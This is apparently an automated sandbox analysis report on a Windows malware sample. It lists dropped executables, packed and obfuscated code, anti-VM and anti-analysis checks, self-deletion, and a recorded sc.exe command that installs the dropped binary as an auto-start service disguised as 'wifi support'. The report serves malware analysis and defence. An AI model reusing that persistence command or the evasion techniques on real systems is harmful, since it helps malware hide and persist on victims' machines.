Source: 31.0.1F0B.exe.de0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 43.0.1F0B.exe.1e0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 43.0.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 43.0.1F0B.exe.1e0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 43.2.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 0_2_02CA3C66 push esi; ret	0_2_02CA3C7C
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 0_2_02CA3C01 push esi; ret	0_2_02CA3C7C
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00401880 push esi; iretd	3_2_00401893
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_2_00402E94 push es; iretd	3_2_00402EA0
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Code function: 3_1_00402E94 push es; iretd	3_1_00402EA0
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00401880 push esi; iretd	18_2_00401893
Source: C:\Users\user\AppData\Roaming\icgujuh	Code function: 18_2_00402E94 push es; iretd	18_2_00402EA0
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Code function: 22_2_00422368 push eax; ret	22_2_00422386
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_004139B0 push eax; ret	23_2_004139DE
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D33C00 push eax; ret	23_2_02D33C2E
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_02BE1283 push ds; ret	26_2_02BE1284
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_02BE3A79 push 0000002Bh; iretd	26_2_02BE3A7F
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Code function: 26_2_047C9FBB push edi; iretd	26_2_047C9FBF
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0573C502 push E80B905Eh; ret	31_2_0573C509
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05732588 push ecx; retf	31_2_057325FC
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0573D4EA push esp; iretd	31_2_0573D4F1
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0573CF78 pushfd ; retf	31_2_0573CF79
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0573CF38 pushad ; retf	31_2_0573CF39
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574C6D2 push edi; retn 0040h	31_2_0574C6D4
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_0574B97A push 0000001Ah; retf	31_2_0574B97C
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05A16506 push ecx; iretd	31_2_05A1650C
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Code function: 31_2_05A13556 push cs; retf	31_2_05A1355F

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,

23_2_0040C2E0

Source: 1F0B.exe.13.dr

Static PE information: 0xBDC2F328 [Thu Nov 20 00:47:36 2070 UTC]

Source: AEFA.exe.13.dr	Static PE information: section name: .wibobah
Source: B729.exe.13.dr	Static PE information: section name: .ctors
Source: BFF4.exe.13.dr	Static PE information: section name: .himav
Source: 5D68.exe.13.dr	Static PE information: section name: .pamicak
Source: 5D68.exe.13.dr	Static PE information: section name: .dos
Source: 5D68.exe.13.dr	Static PE information: section name: .modav
Source: 5D68.exe.13.dr	Static PE information: section name: .nugirof
Source: ecgujuh.13.dr	Static PE information: section name: .pamicak
Source: ecgujuh.13.dr	Static PE information: section name: .dos
Source: ecgujuh.13.dr	Static PE information: section name: .modav
Source: ecgujuh.13.dr	Static PE information: section name: .nugirof

Source: initial sample	Static PE information: section name: .text entropy: 7.99718561212
Source: initial sample	Static PE information: section name: .text entropy: 6.86420375863
Source: initial sample	Static PE information: section name: .text entropy: 6.86420375863

Source: 1F0B.exe.13.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 1F0B.exe.13.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 31.0.1F0B.exe.de0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 31.0.1F0B.exe.de0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 31.0.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 31.0.1F0B.exe.de0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 31.2.1F0B.exe.de0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 31.2.1F0B.exe.de0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 31.0.1F0B.exe.de0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 31.0.1F0B.exe.de0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 31.0.1F0B.exe.de0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 31.0.1F0B.exe.de0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 43.0.1F0B.exe.1e0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 43.0.1F0B.exe.1e0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 43.0.1F0B.exe.1e0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 43.0.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 43.0.1F0B.exe.1e0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 43.0.1F0B.exe.1e0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 43.0.1F0B.exe.1e0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 43.0.1F0B.exe.1e0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'
Source: 43.2.1F0B.exe.1e0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'zH0HRtC1TQ', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 43.2.1F0B.exe.1e0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'e0KvAJ04t7', '.cctor', 'tkJiqTkevvhouv4Lnq', 'wb1JDJ9abSmQ04uQSy', 'gjE9MB6RZR53VLvMob', 'MAoOSKcqg8B5IDu1o3'

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\icgujuh			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ecgujuh			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BFF4.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ecgujuh	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2B8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\AEFA.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\rhrovez\rljdetbq.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8FB8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D830.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\97B8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5D68.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	File created: C:\Users\user\AppData\Local\Temp\rljdetbq.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\icgujuh	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1F0B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EC9F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B729.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\rhrovez\rljdetbq.exe (copy)

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2B8.exe

Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create rhrovez binPath= "C:\Windows\SysWOW64\rhrovez\rljdetbq.exe /d\"C:\Users\user\AppData\Local\Temp\2B8.exe\"" type= own start= auto DisplayName= "wifi support

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\cz2zyel2zd.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\icgujuh:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

23_2_0040C2E0

Source: C:\Users\user\AppData\Local\Temp\2B8.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_23-8794

Found evasive API chain (may stop execution after checking locale)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_23-8792

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\cz2ZyeL2Zd.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\icgujuh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D68.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep			graph_23-9846
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_23-9846

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_00406AA0		23_2_00406AA0
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	Code function: 23_2_02D26CF0		23_2_02D26CF0

Found evasive API chain (may stop execution after checking computer name)

Show sources

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

graph_23-9806

Source: C:\Windows\explorer.exe TID: 1768	Thread sleep count: 588 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5360	Thread sleep count: 231 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4828	Thread sleep count: 360 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4828	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5396	Thread sleep count: 346 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3660	Thread sleep count: 165 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5388	Thread sleep count: 214 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6340	Thread sleep count: 223 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6348	Thread sleep count: 396 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3100	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1F0B.exe TID: 6960	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 588	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 360	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 396	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

API coverage: 6.2 %

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_02D26CF0

23_2_02D26CF0

Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BFF4.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEFA.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\rhrovez\rljdetbq.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8FB8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D830.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\97B8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2B8.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rljdetbq.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B729.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Evaded block: after key decision

graph_23-9792

Source: C:\Users\user\AppData\Local\Temp\1F0B.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	API call chain: ExitProcess graph end node	graph_23-9817
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	API call chain: ExitProcess graph end node	graph_23-8723
Source: C:\Users\user\AppData\Local\Temp\EC9F.exe	API call chain: ExitProcess graph end node	graph_23-8783

Source: svchost.exe, 00000014.00000002.404788118.00000246D0884000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWv
Source: explorer.exe, 0000000D.00000000.308935069.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.308995090.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000D.00000000.308935069.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000D.00000000.318239161.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFF4.exe.13.dr	Binary or memory string: hHGFSW
